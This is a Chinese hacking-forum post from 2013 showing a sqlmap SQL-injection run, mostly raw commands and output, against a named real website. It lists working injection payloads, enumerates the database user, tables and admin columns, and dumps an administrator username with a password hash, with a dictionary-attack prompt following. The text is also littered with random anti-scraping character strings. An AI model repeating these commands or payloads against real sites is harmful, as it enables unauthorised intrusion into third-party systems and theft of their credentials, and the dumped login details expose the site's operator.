找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2452|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db' A3 I- a8 O  ]; p/ j* h2 l
ms "Mysql" --current-user       /*  注解:获取当前用户名称: Q( f; w' B3 y! ^
    sqlmap/0.9 - automatic SQL injection and database takeover tool
0 ?8 Z- I% M, {+ Z% x8 S. a5 m% h    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    ' w; x! o8 w7 n" v! Z3 i[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as' ^" f9 @! p! w9 A
    session file  p. F2 ^8 F" b# M; C0 u
    [16:53:54] [INFO] resuming injection data from session file
    / E; }! W+ c9 K1 g" |. {[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    4 L) V8 d5 a6 \9 ^+ ?! i8 \) ^[16:53:54] [INFO] testing connection to the target url
    ! A% _5 x+ Q0 s) E* @" Dsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    & O  G+ a* Q) x0 o1 g. Psts:' F) D; {% ~0 D3 g
    ---
    $ ]/ P- H+ U/ u" IPlace: GET1 M7 w) |( x8 x$ a2 O" L
    Parameter: id5 j% t. f: p# d6 b, q
        Type: boolean-based blind
    - I$ p, g% S% V! {) j    Title: AND boolean-based blind - WHERE or HAVING clause6 g+ I- ?9 X4 Q; K+ ~- X
        Payload: id=276 AND 799=799
    * f- {! _' b3 w- O! q4 T7 r3 j    Type: error-based
    & {  x( _2 G, T0 A# T    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    8 d# Y7 Y( p3 G    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    3 A1 J3 h3 g. e  k& X; |120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, e2 i- D- l. ]$ h1 U) Y; f
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 w$ D5 t0 H% ^/ R+ H7 E2 V5 K( k$ o
        Type: UNION query0 w* F3 O4 z0 j+ d& ^* E3 |
        Title: MySQL UNION query (NULL) - 1 to 10 columns: c0 A" J7 X; c5 t6 }
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR& R. Z; D' f) t3 W
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    " f% k+ `3 P' M9 z* ^CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#0 g9 o, `4 @. w7 ]4 J& T1 B
        Type: AND/OR time-based blind
    + _0 A0 y& d% o! p* ], ~    Title: MySQL > 5.0.11 AND time-based blind
    6 D6 g  g. N+ e) n# j% w    Payload: id=276 AND SLEEP(5)
    ) }% \0 d& I/ h5 l' j---
    . J. Z, Q# M# v3 O/ V* q8 F& k0 g[16:53:55] [INFO] the back-end DBMS is MySQL
    ! r9 ?5 _2 g4 Q0 V& f5 v+ qweb server operating system: Windows
    # U; I# n  r% [web application technology: Apache 2.2.11, PHP 5.3.0# q, }: c- E1 N4 I
    back-end DBMS: MySQL 5.0, Q+ d2 r/ d  O3 e
    [16:53:55] [INFO] fetching current user! v8 n/ t8 G* p% \4 C* _' c
    current user:    'root@localhost'   
    5 W& L$ J- ~# P+ w* D/ _  _- @[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou2 n* T1 n' n( o- i- T8 X
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:58, p3 `! e8 B1 J" Q" W' x; r& I; s

    ' m- N4 e2 c9 D9 L! h9 J) XD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db0 f) [7 E* j# o3 F! y+ B/ o  m
    ms "Mysql" --current-db                  /*当前数据库
    1 \% g; z: _* v1 _5 N6 W    sqlmap/0.9 - automatic SQL injection and database takeover tool/ a8 k0 H& o$ G& y
        http://sqlmap.sourceforge.net
  • starting at: 16:54:161 S4 e8 L& T, t: n. S" I8 ]; _% l
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as) N, t8 {5 r6 _# H5 ?
    session file
    ; b" \0 ~! c4 p! t( @& u[16:54:16] [INFO] resuming injection data from session file4 [  h7 I& G. u' I
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file1 Y1 O. D" @5 o7 u3 w1 W4 G
    [16:54:16] [INFO] testing connection to the target url6 G% x/ S: P3 J, m) a1 t0 a
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    8 k9 X& n) G0 y! G0 Asts:1 N$ h& ^: P, p' z& U
    ---
    & o+ M1 G  L2 ~. H8 aPlace: GET  P7 n  y% X8 C. h8 O, W
    Parameter: id
    " C4 B! O/ H. l; ?    Type: boolean-based blind- Z4 e8 t3 {7 K& \
        Title: AND boolean-based blind - WHERE or HAVING clause
    7 X9 d1 z3 d! j& W' E3 v% o+ |    Payload: id=276 AND 799=799: F2 ~. f  d8 H: _
        Type: error-based
    / G# O7 r, X9 e2 R# R7 C) q- X% P# F    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
      G7 [+ e8 k& E/ r% j    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    2 b9 L. K1 l/ X7 [120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    4 [& a9 O  P* b2 [),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); g8 J* C+ ?. z3 x" Z
        Type: UNION query* A$ o* `+ M$ ?! `  c! k
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    & w( E8 |3 m& o- w0 N% [7 a; J    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* W# H- r- L/ T; Y  I
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ! U, v1 H1 c  j3 g3 J/ ~CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    # a+ M" C- `! r+ b. |$ ^    Type: AND/OR time-based blind
    6 h) B8 V' A" x. e4 }    Title: MySQL > 5.0.11 AND time-based blind
    1 h! E# x( {- E    Payload: id=276 AND SLEEP(5)  t) \1 R. R* J4 G1 K1 B
    ---
    % W; j: Q+ l7 y$ x- M6 c5 T[16:54:17] [INFO] the back-end DBMS is MySQL
    ' z3 I0 N1 ?$ \web server operating system: Windows
    " ^$ X* P4 D( q) L# [web application technology: Apache 2.2.11, PHP 5.3.05 _: x! u) f: S+ }# `" s1 ]
    back-end DBMS: MySQL 5.0( @+ e7 S* h4 B; ~0 @3 k; {
    [16:54:17] [INFO] fetching current database5 Q2 \9 g" {+ \; g
    current database:    'wepost': k+ f; H# h- ~- c% p
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    $ V+ h2 ]( g+ wtput\www.wepost.com.hk'
  • shutting down at: 16:54:18/ v1 t8 l, Q2 o" W
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! X" Z5 z3 k( I
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名& M9 y& m7 i8 ?0 i/ D1 Z
        sqlmap/0.9 - automatic SQL injection and database takeover tool; p7 a7 D' R# z0 a( Z: E
        http://sqlmap.sourceforge.net
  • starting at: 16:55:257 b! T$ C  _/ h: g4 n1 E) j
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    $ u0 f8 h0 b: r. Z session file
    2 O* k9 {8 G% e7 @( Y[16:55:25] [INFO] resuming injection data from session file
      k; [7 m9 J) E; Y2 W. |, a9 r[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file! L9 J2 n) D) z
    [16:55:25] [INFO] testing connection to the target url
    ' n# t" W) ]3 m/ Y) lsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    9 K4 X  {% D, K! m/ L+ Fsts:
    * A6 R% \0 u0 M2 K# G" O6 M---
    7 l  F3 S4 U4 i- VPlace: GET* l+ F& C9 {, e/ R2 O0 R
    Parameter: id3 Z; a' e5 q4 k- p- n
        Type: boolean-based blind6 U: d- N" n8 E2 o; b9 b% ^
        Title: AND boolean-based blind - WHERE or HAVING clause
    # h. w4 X- Z6 s0 B    Payload: id=276 AND 799=7990 E, z- c. ]& @" n$ c. t
        Type: error-based
    ; O; {8 I5 Y5 A3 F    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& Q4 ~" ]9 k3 G
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    8 @( Q9 z/ S  W9 j120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58$ k* |( |7 G8 b; l; {" P5 l7 f
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    6 X9 B; t* ?) Z/ n1 j# l7 d    Type: UNION query, i' w- D+ J0 V/ I$ ~4 h
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    # b6 O1 ^- O( k% p: m    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ; H  m9 m2 V1 ^' D! c& [3 L) h(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    0 M8 \  g4 d, B# [* n4 _7 |3 a" k' ZCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ @" H8 C& J7 z4 @( {2 D- g' Y
        Type: AND/OR time-based blind
    : Q9 l2 I+ B9 [; v3 c3 b    Title: MySQL > 5.0.11 AND time-based blind
    ; g0 J' P% }. a2 y' B" a    Payload: id=276 AND SLEEP(5)6 e" z0 h! J. c; e7 P% X4 D- j
    ---( s1 v" k; C/ K
    [16:55:26] [INFO] the back-end DBMS is MySQL) p/ h8 \6 A; m
    web server operating system: Windows; f  f! n1 G* u) |* j
    web application technology: Apache 2.2.11, PHP 5.3.0
    $ T/ Q. [1 h# \- q9 Y8 Eback-end DBMS: MySQL 5.0, S8 o, g9 w' b0 u$ ~) p! v, L
    [16:55:26] [INFO] fetching tables for database 'wepost'% I  O4 \  [. {4 G$ k
    [16:55:27] [INFO] the SQL query used returns 6 entries
    4 Z0 j4 Y- d7 |% L4 @Database: wepost
    / R  G% D* T8 q( E: p) F$ c[6 tables], q9 n: y8 i$ h5 r. G. K6 t
    +-------------+
    5 D4 C/ T! I3 j4 @' v& t5 ]| admin       |$ z; ~, R3 e. W9 }/ U
    | article     |
    & n# y% |& Z+ N6 M: P3 _8 a. \! {& P| contributor |
    . n$ J, Z! j0 i% a4 S1 y+ k| idea        |9 S/ M, j1 Z9 K
    | image       |
    ) Z5 u( k: d; O+ w. P; S| issue       |
    ' \) E6 g  ~8 R+-------------+' R) c3 I% u, F8 i( U6 J
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    . P8 T/ ~2 d& |- Ftput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    # m' s  M8 e* j# V# b5 e$ k6 R2 _7 w6 V4 i5 ]/ Q8 T. F
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 d5 z" `1 i7 W/ L
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名8 q! b3 @! t. @! [" L
        sqlmap/0.9 - automatic SQL injection and database takeover tool& U5 g3 j3 b; W1 O
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    ) c5 r) f/ B0 S/ R) D8 {sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    7 |6 }. g3 l& c% M- `3 L1 K6 bsts:6 z/ H3 L/ C; g! R, J
    ---
    5 r! C! i" Q! \  c0 q3 p( J  {Place: GET- [2 |: o6 R  z% h
    Parameter: id
    ' A8 Z  B" y# V3 ?" O0 u    Type: boolean-based blind; T9 Q" c. v; c' w
        Title: AND boolean-based blind - WHERE or HAVING clause
    , d& ?% M& S7 q, ]6 F" D8 B3 l    Payload: id=276 AND 799=799
    $ J  _! {% m6 V5 w# O  Y: \2 {    Type: error-based
    - D3 l) Z8 e& \    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    $ I6 \& K1 o1 W: {9 x    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    5 Y! s& F7 S% y( J120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,580 ~3 D3 L2 u5 |7 x
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    0 C: z6 H5 E6 B. U& r    Type: UNION query
    ( H/ t, ~. w' V! }9 u) t    Title: MySQL UNION query (NULL) - 1 to 10 columns) R$ T1 ?6 a: \- R, a% D' O
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    * [: j* M% q; `  n3 }(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 z6 u* K2 C: b( o8 i) \
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#* b) L* g2 V7 }( h
        Type: AND/OR time-based blind
    : k- k2 K0 c1 `    Title: MySQL > 5.0.11 AND time-based blind! v) V' n$ ~, Q  S5 |8 f7 @0 m
        Payload: id=276 AND SLEEP(5)# j+ z# D& `$ p8 I: j6 M
    ---
    # J1 _$ u: \1 h* Pweb server operating system: Windows
    0 i6 _3 B, Y5 n" F8 }5 Tweb application technology: Apache 2.2.11, PHP 5.3.0; ^; T6 D5 x. A* f9 q, k
    back-end DBMS: MySQL 5.0, Y" @6 G7 c! a
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    2 f/ m  E0 g: _+ ?2 P- [) R5 Jssion': wepost, wepost
    . ?' q) N( A+ z! `# r0 ?7 }Database: wepost
      h' ?# m7 Q: D3 h; i6 \5 wTable: admin
    7 b! b! |- N' B( C! P# J: a6 r/ v[4 columns]
    ; r1 X  i( |- F* {. @+----------+-------------+* V5 D# X+ b/ z; W& T' c7 l
    | Column   | Type        |
    + G! K5 a( h. R6 J3 c+----------+-------------+5 }& Q+ h/ R1 S& Z6 N9 k
    | id       | int(11)     |0 _0 e, |& l4 m% P4 Q0 @% Z  h8 i
    | password | varchar(32) |
    1 I- v1 e$ r' I1 y| type     | varchar(10) |
    ; v6 x0 n, p4 H; Q9 J7 A" M| userid   | varchar(20) |
    : s) `/ O5 _0 `) {0 X$ Y7 V+----------+-------------+
    5 r" x0 [* t4 P5 N5 P
  • shutting down at: 16:56:19& R& k* H% |5 a! F
    2 [' d6 L6 l! r5 ]
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* H" l5 w2 q+ v' M# G
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    ! X% R3 ~2 V: ^! D' K. E    sqlmap/0.9 - automatic SQL injection and database takeover tool
    . E! ~; x4 Z( b' H! v6 |  B: R    http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    ) @" c- ^  s! F% _* G( [! fsqlmap identified the following injection points with a total of 0 HTTP(s) reque" D; f: B- r% ^/ s
    sts:: {3 ?% D& |& E4 T& V/ t
    ---, |% r2 P! e; g8 O- K
    Place: GET
    ) l% H+ \; J$ PParameter: id
    ) D' T# A) ~% B3 A    Type: boolean-based blind7 o. i+ W/ O0 X6 t- c
        Title: AND boolean-based blind - WHERE or HAVING clause
    5 @. {/ H0 _' L    Payload: id=276 AND 799=799
    , x0 h$ h/ x( H0 ]    Type: error-based
    2 s1 f  J! R" l" c1 a) S( I, E    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    , x0 n2 q* S6 |' G6 I    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    / t" L  j' B; L( q5 F. N) K. o! R, U120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58: p( w# [' `' M. k3 ^8 K
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 S! v. v2 W, b6 ?( \, K& R
        Type: UNION query
    7 [* }0 @) O8 e    Title: MySQL UNION query (NULL) - 1 to 10 columns4 e$ @- E3 y! D  o. F
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    : y' r& F9 m* Y% Y( [$ q  i) l(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 C" Z4 i* _  x$ M" I
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
      z) A& L& E" g3 |, B    Type: AND/OR time-based blind
    3 H% x2 u* J( t( Z) {' t    Title: MySQL > 5.0.11 AND time-based blind  }- [  J6 o# n4 p  Z8 |  q5 J
        Payload: id=276 AND SLEEP(5)
    / H2 Q5 D  }/ h# K---
    % [  r0 N" K1 j* Q/ {web server operating system: Windows5 [3 F/ l, C: ^# @6 H
    web application technology: Apache 2.2.11, PHP 5.3.0
    6 l5 s/ T1 d# N5 \& i6 oback-end DBMS: MySQL 5.0: f1 l" M( t0 D' b3 a3 U, a
    recognized possible password hash values. do you want to use dictionary attack o# F; u8 [5 u5 N5 Y1 E
    n retrieved table items? [Y/n/q] y, g; L/ D7 n' a4 x
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    , S0 @+ b4 k3 S: }- T" Ldo you want to use common password suffixes? (slow!) [y/N] y, B0 f9 @3 s% w/ k& E( J! {
    Database: wepost
    " C) Q$ F- i' |* V; z1 Z8 n& jTable: admin
    1 [. |* X9 ]* v" l' h" I  W0 A[1 entry]
    4 @/ O8 P2 R! U( s  W( x5 E+----------------------------------+------------++ ]) q! }/ f5 T7 \* E2 z
    | password                         | userid     |
    3 t+ {6 x8 B! ?- L) x% M+----------------------------------+------------+
    7 f" A/ _, G& ~6 g# h/ y| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |" f. Z+ \+ a" U+ m4 U3 }, m: u# D) s+ }+ H' \
    +----------------------------------+------------+
    ) v+ j4 `, B6 `3 X
  • shutting down at: 16:58:147 G( ?1 m& p: D2 j! ^6 K6 }! Y

    9 h$ i2 P: ~. OD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表